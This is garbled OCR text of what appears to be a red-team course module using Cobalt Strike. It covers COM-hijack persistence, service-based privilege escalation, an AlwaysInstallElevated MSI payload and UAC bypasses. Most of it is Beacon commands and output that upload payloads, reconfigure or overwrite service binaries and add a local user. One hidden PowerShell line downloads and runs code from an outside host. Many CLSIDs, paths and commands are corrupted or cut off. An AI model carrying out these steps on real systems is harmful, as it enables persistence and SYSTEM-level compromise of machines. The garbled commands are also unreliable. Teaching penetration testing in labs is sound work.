HKCUN\Software\Classes \CLSID\{DESAAE 11-A475-4c5b-ABO0-C66DE400274E ) InProcServer12
HKCU\Software\Classes \CLSID\{0ESAAE11-A475-4c5b-ABD0-CEEDE400274E ) InProc Server32
HKCUM\Software \Classes\CLSID\{F324E4F9-8496-40B2-A1FF-9617C 1C9AFFE) UnProc Server32
HKCU\Software \Clagses \CLSIDV{FI24E4F3-2496-40b 2-A1FF-9617C 1CIAFFE) UnProc Server32
HKCU\Software \Classes\CLSID\{F324E4F5-8456-40b 2-A1FF-9617C 1CSAFFE) UnProc Server32
HKCU\Software‘\Classes\CLSID\{948SFEB2-1925-4D01-B788-60912C70F 7F 2)\InProc Server32
HKCR\CLSID\{9489FEB2-1925-4D01-B788-6D912C70F 7F 2}\In Proc Server32

HKCU\Software \Classes \CLSID\{FI24E4F9-8496-40B2-A1FF-9617C 1CSAFFE) \InProc Server32
HKCU\Software \Classes \CLSID\{F324E4F5-8456-40b 2-A1FF-9617C 1CSAFFE) UnProc Server32
HKCU\Software \Classes\CLSID\{F324E4F5-8496-40b 2-A1FF-9617C 1CSAFFE}InProc Server32
HKC L \Software \Classes \CLSID'\{94B9FER2-1925-4D01-B788-60912C70F 7F 2}\InProc Server32
HKCRA\CLSID\{9489FEB2-1925-4D01-B738-6D912C70F 7F 2} InProc Server32
HKCU\Software'\Classes\CLSID"\{4234D458-0245-4DF3-B780-389394 3456E 1} \InProc Server32
HKCU\Software \Classes\CLSID"\{4234d49%-0245-4df 3-b 780-389394 34562 1 \InProc Server32
HKCU\Software\Classes\C1 SID\{4234d4%-0245-44f 3-b 780-389394 34562 1 }\inProc Server32
HKC U\ Software \Classes\CLSID\{9FCBES10-A27C4B3B-B3A 1 BFGSF00256A8 Unproc Server32
HKCU\Software \Classes\CLSID\{SFCBES10-A27C-4B3B-B5A3-BF6SF00256 A8 \inProc Server32
HKC U \Software\Classes\CLSID\{SFCBE510-A27C-4B3B-B9A3-BFE5FD0256A8) \InProc Server32
HKC U\ Software \Classes\CLSID\{9FCBES10-A27C-4B3B-B9A-BFESFO0256A8) InProc Server 32
HKCUNSoftware \Classes \CLSIDN\{SFC8ES10-A27C 4B 3B-B3AI-BFESF00256A8  InProcServer32
HKCU\Software \Classes\CLSID\{SFCBES10-A27C-4B3B-B5A3-BFESF00256A8 \InProc Server32
HKCU\Software\Classes\CL SID\{SFCBES10-A27C-4B3B-B9A3-BFE5FD0256A8) Unproc Server32
HKC LU\ Software \Classes\CLSID\{9FCBES10-A27C-4B3B-B9A-BFESFO0256A8) InProc Server 32
HKCUNSoftware\Classes \CLSID\{SFCBES10-A27C-4B3B-B9A3-BF65F00256A8) \InProc Server32
HKCU\Software‘\Classes\CLSID'\{SFCBE510-A27C-4B3B-B5A3-BF65F00256A8) InProc Server32
HKCU\Software \Classes\CLSID\{9FCBES10-A27C-4B3B-B9A3-BFESFO0256A8  InProc Server 32
HKC L\ Software \Classes\CLSID\{9FCBES10-A27C-4B3B-B9A-BFESFO0256A81 InProc Server 32
HKCU\Software \Classes\CLSID\{D2508842-8884-4A4A-6321091314379BD D \Inproc Server32
HKCU\Software \Classes\CLSID\{D2508842-8884-4A4A-B321-091314379BDD\InProcServer32
HKC U \Software \Classes\CLSID'\{D25D8842-8884-4A4A-8321-091314379BDD\InProc Server32
HKCU\Software\Classes\CLSID\{D2508842-3884-4A4A-8321-091314379BDD\InProc Server32
HKCUM\Software\Classes\CLSID\{D2508842-8884-4A4A-B321-051314375BDD P\InProcServer32
HKCU\Software \Classes\CLSID\{D25D8842-8884-4A4A-B321-091314379BD D\ InProc Server32
HKC L \Software \Classes \CLSID'\{812F944A-C5CB-4CD9-B0AG-BIDABDZF 228D M\Inproc Server12
HKC LnSoftware\Classes\CLSIDW{81 2F944ACRCE-4CD9-B0AR-BADABDZF 228D MInProcServer32
HKCU\Software \Classes \CLSID {81 2F544A-C5C8-4CD5-B0AG-B3DAB02F 228D \InProcServerd2
HKCU\Software \Classes\CLSID'\{812F944A-C5CB-4CD9-B0AB-BIDABDZF 228D \inProcServerd2
HKCU\Software\Classes\C1 SID\{812F9344A.C5C8-4CDS-BOAG-BADARNZF 228D ) \InProcServerd2
HKC U SoftwareClasses \CLSID{ 81 2F544A CRC8-4CDS-B0OAR-BIDAB02F2280 MnProcServerd?
HKCU\Software\Classes\CLSID\{BFCD4ADC-06B6-4384-B768-0DAA7I2C 3B0E Inproc Server32
HKC U \Software\Classes\CLSID\{BFCD4ADC-06B6-4384-B768-0DAATI2C 3B0E}\InProc Serverd2
HKCU\Software \Classes \CLSIDV{BFCDAADC-06BE-4384-B768-0DAATI2C I80E )\ InProc Server32
HKCUMSoftware\Classes\CLSID\{BFCD4ADC06B6-4384-B768-0DAATI2C 380E )\ InProcServer32

Result

NAME NOT FOUND
NAME NOT FOUND
NAME NOT FOUND
NAME NOT FOUND
NAME NOT FOUND
NAME NOT FOUND
NAME NOT FOUND
NAME NOT FOUND
NAME NOT FOUND
NAME NOT FOUND
NAME NOT FOUND
NAME NOT FOUND
NAME NOT FOUND
NAME NOT FOUND
NAME NOT FOUND
NAME NOT FOUND
NAME NOT FOUND
NAME NOT FOUND
NAME NOT FOUND
NAME NOT FOUND
NAME NOT FOUND
NAME NOT FOUND
NAME NOT FOUND
NAME NOT FOUND
NAME NOT FOUND
NAME NOT FOUND
NAME NOT FOUND
NAME NOT FOUND
NAME NOT FOUND
NAME NOT FOUND
NAME NOT FOUND
NAME NOT FOUND
NAME NOT FOUND
NAME NOT FOUND
NAME NOT FOUND
NAME NOT FOUND
NAME NOT FOUND
NAME NOT FOUND
NAME NOT FOUND
NAME NOT FOUND
NAME NOT FOUND
NAME NOT FOUND
NAME NOT FOUND
NAME NOT FOUND
NAME NOT FOUND
NAME NOT FOUND

Detail

Desired Access;
Desired Access:
Desired Access:
Desired Access;
Desired Access:
Desired Access:
Desired Access:
Desired Access;
Desired Access:
Desired Access:
Desired Access:
Desired Access;
Desired Access:
Desired Access:
Desired Access:
Desired Access;
Desired Access:
Desired Access:
Desired Access:
Desired Access;
Desired Access:
Desired Access:
Desired Access:
Desired Access:
Desired Access:
Desired Access:
Desired Access;
Desired Access:
Desired Access:
Desired Access:
Desired Access;
Desired Access:
Desirad Access:
Desired Access:
Desired Access;
Desined Access:
Desired Access:
Desired Access:
Desired Access:
Desired Access:
Desired Access:
Desired Access:
Desired Access:
Desired Access:
Desired Access:
Desired Access:

Maximum Allowed
Maximum Allowed
Cluery Value
Maximum Allowed
Maximum Allowed
Query Value
Maximum Allowed
Maximum Allowed
Query Value
Cluery Value
Cluery Value
Maximum Allowed
Maximum Allowed
Cluery Value
Guery Value
Query Value
Maximum Allowed
Maximum Allowed
Read

Maximum Allowed
Maximum Allowed
Maximum Allowed
Maximum Allowed
Maximum Allowed
Read

Maximum Allowed
Maximum Allowed
Maximum Allowed
Maximum Allowed
Maximum Allowed
Read

Maximum Allowed
Maximum Allowed
Maximum Allowed
Maximum Allowed
Maximum Allowed
Read

Maimum Allowed
Maximum Allowed
Maximum Allowed
Maximum Allowed
Maximum Allowed
Read

Maximum Allowed
Maximum Allowed
Maximum Allowed

Showing 3,414 of 3,036,421 events (0.17%)

Backed by virtual memory

One aspect to look out for is the number of times a particular CLSID is loaded. If you hijack one that is loaded every couple of seconds you're going to have a rough time - so it's well worth the additional effort to

find one that's loaded semi-frequently but not so much so, or loaded when a commonly-used application (Word, Excel, Outlook etc) is opened.

Scrolling through, | picked out this CLSID being loaded by C:\Windows\system32\DllHost.exe.

HKCU\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 }\InprocServer32

We can use some quick PowerShell to show that the entry does exist in HKLM, but not in HKCU.

PS C:\>» Get-Item -Path

Name

InprocServer3i2?

-Ttem -Path
Cannot find path

Property

(default)

: C:\Windows\System32\thumbcache.dll

ThreadingModel : Apartment

To exploit this, we can create the necessary registry entries in HKCU and point them at a Beacon DLL.

PS C:\> New-Item -Path
PS C:\> New-Item -Path
PS C:\> New-ItemProperty -Path

because it does not exist.

To generate the DLL, go to Attacks > Packages > Windows Executable (S) and select Windows DLL as the output type. Then upload the DLL to the location we specified in the registry entry above.

beacon> cd C:\

beacon> upload C:\Payloads\beacon.dll

When DIlHost.exe loads this COM entry, we get a Beacon.

B Cobalt Strike — m .
O O EBE=¢ 820U SebBE fa B a

external nternal = listener user f'l:l'l'l'lpl.lllE‘I" note Fllll] arch last
2 10.10.5.110 10.10.5.110 http-port-80 Administrator * WINDOWS-DEV DliHost exe 4668 X564 615ms

Another great place to look for hijackable COM components is in the Task Scheduler. Rather than executing binaries on disk, many of the default Windows Tasks actually use Custom Triggers to call COM objects.

And because they're executed via the Task Scheduler, it's easier to predict when they're going to be triggered. We can use the following PowerShell to find compatible tasks.

= Get-ScheduledTask

foreach ($Task in $Tasks)

I
L

i
f
L

f ($Task.Actions.ClassId -ne $null)

$Task.Triggers.Enabled -eq $true)

f ($Task.Principal.GroupId -eq

ask.TaskName
k. TaskPath
$Task.Actions.ClassId

This script is rather self-explanatory and should produce an output similar to the following:

Task Name:
Task Path:
CLSID:

Task Name:
Task Path:
CLSID:

Task Name:
Task Path:
CLSID:

Task Name:

Task Path:
CLSID:

If we view the MsCtfMonitor task in the Task Scheduler, we can see that it's triggered when any user logs in. So this would act as an effective reboot-persistence.

MsCtfMonitor
\Microsoft\Windows\TextServicesFramework\
{BlS?SCFE—9A55—4E}@3—A5E1— FBSDIEBDCEEI}

CacheTask
\Microsoft\Windows\Wininet\
{0358B920-0ACT7-461F-98F4-58E32CD89148}

SystemSoundsService
\Microsoft\Windows\Multimedial
{2DEA658F-54C1-4227-AF9B-260AB5FC3543}

Calibration Loader

\Microsoft\Windows\WindowsColorSystem\
{B210D694-C8DF-490D-9576-9E20CDBC20BD}

Mame

(5 MsCtfMonitor

Status Triggers

Ready

MNext Run Time Last Run Time

At log on of any user

Last Run Result Author Created

04/05/2021 16:33:39  (0x0)

General

Triggers  Actions Conditions

settings

History (disabled)

When you create a task, you can specify the conditions that will trigger the task. To change these triggers, open the task prope

Ingger

At log on

Details

At log on of any user

Status
Enabled

Lookup the current implementation of {01575CFE-9A55-4003-A5E1-F38D1EBDCBE1} in HKEY_CLASSES_ROOT\CLSID.

PS C:\> Get-ChildItem -Path

Name

Property

InprocServer32 (default)

ThreadingModel

C:\Windows\system32\MsCtfMonitor.dll

Both

We can see it's another InprocServer32 and we can verify that it's currently implemented in HKLM and not HKCU.

PS C:\> Get-Item -Path

Name

{@1575CFE-9A55-4003-A5E1-F38D1EBDCBE1} (default) : MsCtfMonitor task handler

t-Ttem

-Path

Cannot find path

| ft -AutoSize

Property

because it does not exist.

Now it's simply a case of adding a duplicate entry into HKCU pointing to our DLL (as above), and this will be loaded once every time a user logs in.
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Host Privilege Escalation

Host privilege escalation allows us to elevate privileges from that of a standard user to Administrator. It's not a necessary step as we’ll see in later modules how it's possible to obtain privileged credentials and

move laterally in the domain without having to "priv-esc" first.

However, elevated privileges can provide a tactical advantage by allowing you to leverage some additional capabilities. For example, dumping credentials with Mimikatz, installing sneaky persistence or

manipulating host configuration such as the firewall.
In keeping with the mantra of "principle of least privilege" - privilege escalation should only be sought after if it provides a means of reaching your goal, not something you do "just because”.

Common methods for privilege escalation include Operating System or 3rd party software misconfigurations and missing patches. SharpUp can enumerate the host for any misconfiguration-based priv-esc

opportunities.

COMPLETE & CONTINUE —
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Peer-to-Peer Listeners

Peer-to-Peer (P2P) listeners allow Beacons to link their communications together to form a chain. The P2P types in Cobalt Strike are TCP and SMB.

Linking Beacons is especially useful when it comes to pivoting, privilege escalation and really any situation where you need to spawn an additional Beacon payload. They help keep the number of direct outbound

connections to your attacking infrastructure low and for machines and/or principals that can't send HTTP/S outbound at all.

Creating P2P listeners can be done in the Listeners menu, by selecting the TCP or SMB Beacon payload type. These listeners integrate into all the relevant Cobalt Strike workflows such as spawn, spawnas,

inject and jump; and payloads for these listeners can also be generated in the same way from the Attacks menu.

If executing a P2P payload on a target manually, it won't appear in the Ul until the 1ink (for SMB Beacons) or connect (for TCP Beacons) command is used. You can also unlink P2P Beacons and then use

link again from another Beacon to reorganise the chain.

COMPLETE & CONTINUE —
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Windows Services

A Windows "service" is a special type of application that is usually started automatically when the computer boots. Services are used to start and manage core Windows functionality such as Windows Defender,

Windows Firewall, Windows Update and more. Third party applications may also install a Windows Service to manage how and when they're run.

You can see the services installed on a machine by opening services.msc, or via the sc command line tool.

C:\>sc query

SERVICE NAME:
DISPLAY NAME:
TYPE
STATE

WIN32 EXIT CODE . 0
SERVICE_EXIT CODE : ©

CHECKPOINT
WAIT HINT

Appinfo

Application Information
: 30 WIN32
: 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, IGNORES SHUTDOWN)
(0x0)
(0x0)

: Ox6
: Bx0

SERVICE NAME: AudioEndpointBuilder
DISPLAY NAME: Windows Audio Endpoint Builder

TYPE
STATE

WIN32 EXIT CODE : 0
SERVICE_EXIT CODE : ©

CHECKPOINT
WALT HINT

: 30 WIN32
: 4 RUNNING

(STOPPABLE, NOT PAUSABLE, IGNORES SHUTDOWN)

(0x0)
(0x8)
: Ox0
: Ox0

And the Get-Service PowerShell cmdlet.

PS C:\> Get-Service
Name

DisplayName

Status
DependentServices

ServicesDependedOn

CanPauseAndContinue :

CanShutdown
CanStop

ServiceType

Name

DisplayName
Status
DependentServices

ServicesDependedOn

CanPauseAndContinue :

CanShutdown
CanStop

ServiceType

| f1

: AJRouter
: AllJoyn Router Service

: Stopped

False
False

False

: Win32ShareProcess

: ALG

: Application Layer Gateway Service

: Stopped

False
False

False

: Win320wnProcess

A service has several properties that we may want to pay attention to:

Binary Path

This is the path where the actual executable (.exe) for the service is located. Windows services are often in C: \Windows\system32 and third party in C:\Program Files / C:\Program Files (x86)

Startup Type

This dictates when the service should start.

Automatic - The service starts immediately on boot.

Automatic (Delayed Start) - The service waits a short amount of time after boot before starting (mostly a legacy option to help the desktop load faster).

Manual - The service will only start when specifically asked.

Disabled - The service is disabled and won't run.

Service Status

This is the current status of the service.

* Running - The serviceis running.

Stopped - The service is not running.

StartPending - The service has been asked to start and is executing its startup procedure.

StopPending - The service has been asked to stop and is executing its shutdown procedure.

Log On As

The user account that the service is configured to run as.

This could be a domain or local account. It's very common for these services to be run as highly-privileged accounts, even domain admins, or as local system. This is why services can be an attractive target for both

local and domain privilege escalation.

Dependants & Dependencies

These are services that either the current service is dependant on to run, or other services that are dependant on this service to run. This information is mainly important to understand the potential impact of
manipulation.

Like files and folders - services themselves (not just the .exe) have permissions assigned to them. This controls which users can modity, start or stop the service. Some highly sensitive services such as Windows

Defender cannot be stopped, even by administrators. Other services may have much weaker permissions that allow standard users to modity them for privilege escalation.

After a service has been manipulated to trigger a privilege escalation, it needs to be restarted (or started if it's already stopped). There will be cases where this can be done with the management tools, if you have

the required permissions. Other times, you'll need to rely on a reboot.

OPSEC: Restore the service configuration once you are done.

Also ensure you don't interrupt business critical services, so seek permission before exploiting these types of vulnerabilities.
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Unquoted Service Paths

An unquoted service path is where the path to the service binary is not wrapped in quotes. Why is that a problem? By itself it's not, but under specific conditions it can lead to an elevation of privilege.

WMI can be used to pull a list of every service and the path to its executable. Here are some examples:

beacon> run wmic service get name, pathname

Name PathName
ALG C:\Windows\System32\alg.exe

AppVClient C:\Windows\system32\AppVClient.exe
AmazonSSMAgent "C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe"

[...snip...]
Vuln-Service-1 C:\Program Files\Vuln Services\Service 1l.exe

We can see that the paths for ALG and AppVClient are not quoted, but the path for AmazonSSMAgent is. The difference is that this latter path has spaces in them. Vuln-Service-1 has spaces in the path and is also

not quoted - this is condition #1 for exploitation.

When Windows attempts to read the path to this executable, it interprets the space as a terminator. So it will attempt to execute the following (in order):

1. C:\Program.exe
2. C:\Program Files\Vuln.exe
3. C:\Program Files\Vuln Services\Service.exe

If we can drop a binary into any of those paths, the service will execute it before the real one. Of course there's no guarantee that we have permissions to write into either of them - this is condition #2.

The PowerShell Get-Acl cmdlet will show the permissions of various objects (including files and directories).
beacon> powershell Get-Acl -Path "C:\Program Files\Vuln Services™ | fl

Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files\Vuln Services
Owner : BUILTIN\Administrators
Group : WKSTN-1\None
Access : CREATOR OWNER Allow FullControl
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
BUILTIN\Users Allow Write, ReadAndExecute, Synchronize
NT SERVICE\TrustedInstaller Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit
Sddl  : 0:BAG:S-1-5-21-689523297-2952850621-452819511-513D:PAI(A;0ICIIO;FA;;;C0)(A;0ICI;FA;:;SY)(A;0ICI;FA;;;BA)(A;0IC
I;0x1201bf;;;BU)(A;CI;FA;;;S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464) (A;0ICI;0x1200a9; ; ;A
C)(A;0ICI;0x1200a9;;;5-1-15-2-2)

We can see from the output that BUILTIN\Users have Write access to C: \Program Files\Vuln Services.
Payloads to abuse services must be specific "service binaries". We can do this in Cobalt Strike via Attacks > Packages > Windows Executable (S) and selecting the Service Binary output type.

TIP: | recommend the use of TCP beacons bound to localhost only with privilege escalations.

beacon> cd C:\Program Files\Vuln Services
beacon> 1s

[*#] Listing: C:\Program Files\Vuln Services\

Size Type Last Modified Name

5kb fil ©2/23/2021 15:04:13 Service 1.exe
S5kb fil 02/23/2021 15:84:13  Service 2.exe
5kb fil ©2/23/2021 15:04:13 Service 3.exe

beacon> upload C:\Payloads\beacon-tcp-svc.exe
beacon> mv beacon-tcp-svc.exe Service.exe
beacon> 1s

[*] Listing: C:\Program Files\Vuln Services\

Size Type Last Modified Name

5kb il @2/23/2021 15:04:13 Service 1.exe
5kb fil @2/23/2021 15:04:13 Service 2.exe
5kb fil 02/23/2021 15:04:13 Service 3.exe
282kb fil @3/083/2021 11:11:27 Service.exe

beacon> run sc stop Vuln-Service-1

beacon> run sc start Vuln-Service-1

You will not see a Beacon appear automatically. When the service has been started and the Beacon executed, you should see that port you used in your TCP listener configuration (in my case 4444) is listening on
127.0.0.1.

beacon> run netstat -anp tcp

[...snip...]
TCP 127.6.06.1:4444 LISTENING

The Beacon is waiting for us to connect to it, which we do with the connect command.

beacon> connect localhost 4444
[+] established link to child beacon: 10.10.17.231
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Weak Service Permissions

This output from SharpUp shows that Vuln-Service-2 is "modifiable”.
beacon> execute-assembly C:\Tools\SharpUp\SharpUp\bin\Debug\SharpUp.exe
=== Modifiable Services ===

Name : Vuln-Service-2
DisplayName : Vuln-Service-2
Description

State : Running
StartMode : Auto

PathName : "C:\Program Files\Vuln Services\Service 2.exe"

Although it doesn't show what exactly are permissions are, so we need to dig a little deeper. This PowerShell script will print which service rights we have.

beacon> powershell-import C:\Tools\Get-ServiceAcl.psl

beacon> powershell Get-ServiceAcl -Name Vuln-Service-2 | select -expandproperty Access

ServiceRights : ChangeConfig, Start, Stop
AccessControlType : AccessAllowed

IdentityReference : NT AUTHORITY\Authenticated Users
IsInherited : False

InheritanceFlags : None

PropagationFlags : None

We can see that all Authenticated Users have ChangeConfig, Start and Stop privileges over this service. We can abuse these weak permissions by changing the binary path of the service - so instead of it running

C:\Program Files\Vuln Services\Service 2.exe,we can haveitrunsomethinglike C:\Temp\payload.exe.

beacon> mkdir C:\Temp
beacon> cd C:\Temp
beacon> upload C:\Payloads\beacon-tcp-svc.exe

beacon> mv beacon-tcp-svc.exe fake-service.exe

beacon> run sc qc Vuln-Service-2
[SC] QueryServiceConfig SUCCESS

SERVICE NAME: Vuln-Service-2
TYPE : 10 WIN32 OWN PROCESS
START _TYPE : 2 AUTO START
ERROR_CONTROL Al NORMAL
BINARY PATH NAME : "C:\Program Files\Vuln Services\Service 2.exe"
LOAD ORDER_GROUP
TAG : @
DISPLAY NAME : Vuln-Service-2
DEPENDENCIES
SERVICE_START NAME : LocalSystem

beacon> run sc config Vuln-Service-2 binPath= C:\Temp\fake-service.exe
[SC] ChangeServiceConfig SUCCESS

beacon> run sc qc Vuln-Service-2
[SC] QueryServiceConfig SUCCESS

SERVICE NAME: Vuln-Service-2
TYPE : 10 WIN32 OWN PROCESS
START _TYPE 1 2 AUTO START
ERROR_CONTROL : 1 NORMAL
BINARY PATH NAME : C:\Temp\fake-service.exe
LOAD ORDER_GROUP
TAG : @
DISPLAY NAME : Vuln-Service-2
DEPENDENCIES
SERVICE START NAME : LocalSystem

beacon> run sc query Vuln-Service-2

SERVICE NAME: Vuln-Service-2
TYPE : 10 WIN32 OWN PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT PAUSABLE, ACCEPTS SHUTDOWN)
WIN32 EXIT CODE : @ (9x0)
SERVICE EXIT CODE : @ (0x0)
CHECKPOINT : Ox0
WAIT HINT : Ox0

beacon> run sc stop Vuln-Service-2

beacon> run sc start Vuln-Service-2

beacon> connect localhost 4444

[+] established 1link to child beacon: 16.10.17.231
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Weak Service Binary Permissions

This is a slight variation on the vulnerability above but instead of the weak permissions being on the service, it's on the service binary itself.

beacon> powershell Get-Acl -Path “C:\Program Files\Vuln Services\Service 3.exe" | f1l

Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files\Vuln Services\Service 3.exe
Owner : BUILTIN\Administrators
Group : WKSTN-1\None
Access : NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
BUILTIN\Users Allow Modify, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize

: 0:BAG:S-1-5-21-689523297-2952850621-452819511-513D: PAI(A;;FA;;;SY) (A;;FA;;;BA) (A;;0x1301bf; ; ;BU) (A; ;0x1200a9; ;
;AC) (A; 30x1200a9; ;35-1-15-2-2)

This output shows that Users have Modify privileges over Service 3.exe. This allows us to simply overwrite the binary with something else (make sure you take a backup first).

beacon> download Service 3.exe
[*¥] started download of C:\Program Files\Vuln Services\Service 3.exe (5120 bytes)

[*] download of Service 3.exe is complete

beacon> upload C:\Payloads\Service 3.exe
[-] could not upload file: 32

TIP: Use net helpmsg to resolve Windows error codes.

C:\>net helpmsg 32

The process cannot access the file because it is being used by another process.

beacon> run sc stop Vuln-Service-3
beacon> upload C:\Payloads\Service 3.exe
beacon> 1s

[*] Listing: C:\Program Files\Vuln Services)\

Size Type Last Modified Name

5kb fil 82/23/2021 15:04:13 Service 1.exe
5kb fil 02/23/2021 15:04:13 Service 2.exe
282kb fil 83/03/2021 11:38:24 Service 3.exe

beacon> run sc start Vuln-Service-3
beacon> connect localhost 4444
[+] established link to child beacon: 10.10.17.231
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Always Install Elevated

This policy allows standard users to install applications that require access to directories and registry keys that they may not usually have permission to change. This is equivalent to granting full administrative

rights and even though Microsoft strongly discourages its use, it can still be found.

beacon> execute-assembly C:\Tools\SharpUp\SharpUp\bin\Debug\SharpUp.exe

=== AlwaysInstallElevated Registry Keys ===

HKLM:
HKCU:

To exploit this, we need to package a payload into an MSl installer that will be installed and executed with SYSTEM privileges.

* Generate a new Windows EXE TCP payload and save it to C:\Payloads\beacon-tcp.exe.

¢ Open Visual Studio, select Create a new project and type "installer” into the search box. Select the Setup Wizard project and click Next.

* Give the project a name, like Beaconlnstaller, use C:\Payloads for the location, select place solution and project in the same directory, and click Create.
* Keep clicking Next until you get to step 3 of 4 (choose files to include). Click Add and select the Beacon payload you just generated. Then click Finish.

¢ Highlight the Beaconinstaller project in the Solution Explorer and in the Properties, change TargetPlatform from x86 to x64.

When this MSI is eventually installed, it will appear as an installed program on the target.

There are other properties you can change, such as the Author and Manufacturer which can make the installed app look more legitimate.

¢ Right-click the project and select View > Custom Actions.
* Right-click Install and select Add Custom Action.
¢ Double-click on Application Folder, select your beacon-tcp.exe file and click OK. This will ensure that the beacon payload is executed as soon as the installeris run.

* Under the Custom Action Properties, change Run64Bit to True.

Now build the project, which should produce an MSl at C: \Payloads\BeaconInstaller\Debug\BeaconInstaller.msi.

beacon> cd C:\Temp

beacon> upload C:\Payloads\BeaconInstaller\Debug\BeaconInstaller.msi

beacon> run msiexec /i BeaconInstaller.msi /q /n
beacon> connect localhost 4444
[+] established link to child beacon: 18.10.17.231

To remove the MSI afterwards, you can use msiexec /q /n /uninstall BeaconInstaller.msi before removing the file.
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UAC Bypasses

Veterans of Windows Vista will remember the User Account Control window that popped up every time anything wanted to perform a privileged operation. This was to prevent malicious applications from carrying

out actions without the explicit consent of an admin.

By default, applications will run in a Medium Integrity context even if the user is a local administrator. nlamb is a member of Domain Admins and subsequently the local administrators group on wkstn-2. However,

if you launch the Command Prompt "normally” and attempt to add a new local user, it will fail.

BN Command Prompt

Microsoft Windows [Version 186.8.14393]

(c) 2816 Microsoft Corporation. AllL rights reserved.

C:hUsers\nlambrwhoami /fgroups

GROUP INFORMATIONM

LGroup Mame Iype

Ever yone well -knowr
BUILTIN\Users Alias
BUILTINVAdministrators Allas
MNT AUTHORITY\INTERACTIVE Well -know
Well -know
NT AUTHORITY\Authenticated Users Well -know
NT AUTHORITY\This Organizatior Well-know
LOCA | wWell -know
DEVA\Domaln Admlns Group
DEV\Roaming Users Group
Authentlcatlon authorlty asserted ldentlty Well-knowr
DEVA\Denled RODC Password Repllcatlion Group Allas
Mandatory Label\Medium Mandatory Level Label

s:hUsersiynlamb
s:hUsersinlambynet user hacker Passwérd! /

System error S has occurred.

Access 15 denled.

To run the Command Prompt in high integrity, right-click it, select "Run as Administrator" and consent to the UAC dialogue.

User Account Control X

Do you want to allow this app to make
changes to your device?

C:y

Windows Command Processor

Verified publisher: Microsoft Windows

Show more details

Yes No

Now Command Prompt is running as an administrator (you will often see "Administrator” in the window title) and you can add the local user.

ﬂﬂdministratar:l&mmand Prompt

Microsott Windows [Verslion 18.6. 14
(c) 20816 Microsoft Corporation. Al
AWindowshysystem32>whoami

-.:l'.—"'-'-"-ll-l .1'r'h

CiiWindows\system32rnet user hacket

The command completed successfully.

UAC was first introduced in Windows Vista and attracted complaints from users due to the frequency and annoyance of the popups, which led Microsoft to introduce some relaxations. These allow some of their

own trusted, signed applications to "auto-elevate” without consent under certain conditions. In many ways, this decision paved the way for many of the loopholes exploited in "UAC bypasses”.
The default configuration for UAC is Prompt for consent for non-Windows binaries, but can also have different settings such as Prompt for credentials, Prompt for consent and Elevate without prompting.

Seatbelt can be used to query the configuration applied to a machine.

beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Debug\Seatbelt.exe uac

ConsentPromptBehaviorAdmin : 5 - PromptForNonWindowsBinaries
EnablelLUA (Is UAC enabled?) H |

A UAC bypass is a technique by which an application can go from Medium to High Integrity without prompting for consent. This is not technically an EoP because Microsoft do not consider UAC to be a security

boundary; and since the user has to be a local administrator, you're not gaining any privilege that the user is not already allowed to have.

Jump onto the console of WKSTN-2 and spawn a Beacon as nlamb. SharpUp will tell us that we're already a local admin, so UAC can be bypassed.

beacon> getuid
[*¥] You are DEV\nlamb

beacon> execute-assembly C:\Tools\SharpUp\SharpUp\bin\Debug\SharpUp.exe

=== SharpUp: Running Privilege Escalation Checks ===

[*] In medium integrity but user is a local administrator- UAC can be bypassed.

Cobalt Strike provides two means of executing code to bypass UAC. The first is via the elevate command, which bootstraps a listener via the chosen technique. The second is via the runasadmin command,

which allows you to execute any arbitrary command.

beacon> elevate uac-token-duplication tcp-4444-local
[+] Success! Used token from PID 480
[+] established link to child beacon: 18.10.17.132

nlamb
WKSTN-2 @ 5304

beacon> runasadmin uac-cmstplua powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring( http://10.10.5.120:80/b"))"

@5/10 18:03:39 visit (port 80) from: 10.10.17.132
Request: GET /b
page Scripted Web Delivery (powershell)
null

beacon> connect localhost 4444
[+] established link to child beacon: 10.10.17.132

Not all UAC bypasses are created equal - some have "quirks" that you need to be aware of. Seatbelt's TokenPrivileges command can list the current token's privileges . A high integrity process may look

something like this:

beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Debug\Seatbelt.exe TokenPrivileges

SeIncreaseQuotaPrivilege: DISABLED
SeSecurityPrivilege: DISABLED
SeTakeOwnershipPrivilege: DISABLED
SeloadDriverPrivilege: DISABLED
SeSystemProfilePrivilege: DISABLED
SeSystemtimePrivilege: DISABLED
SeProfileSingleProcessPrivilege: DISABLED
SeIncreaseBasePriorityPrivilege: DISABLED
SeCreatePagefilePrivilege: DISABLED
SeBackupPrivilege: DISABLED
SeRestorePrivilege: DISABLED
SeShutdownPrivilege: DISABLED
SeDebugPrivilege: SE PRIVILEGE ENABLED
SeSystemEnvironmentPrivilege: DISABLED
SeChangeNotifyPrivilege: SE PRIVILEGE ENABLED BY DEFAULT, SE PRIVILEGE ENABLED
SeRemoteShutdownPrivilege: DISABLED
SeUndockPrivilege: DISABLED
SeManageVolumePrivilege: DISABLED
SeImpersonatePrivilege: SE PRIVILEGE ENABLED BY DEFAULT, SE PRIVILEGE ENABLED
SeCreateGlobalPrivilege: SE PRIVILEGE ENABLED BY DEFAULT, SE PRIVILEGE ENABLED
SeIncreaselWorkingSetPrivilege: DISABLED
SeTimeZonePrivilege: DISABLED
SeCreateSymboliclLinkPrivilege: DISABLED
SeDelegateSessionUserImpersonatePrivilege: DISABLED

A high integrity session gained using Token Duplication looks like this:

Current Token's Privileges

SeShutdownPrivilege: DISABLED
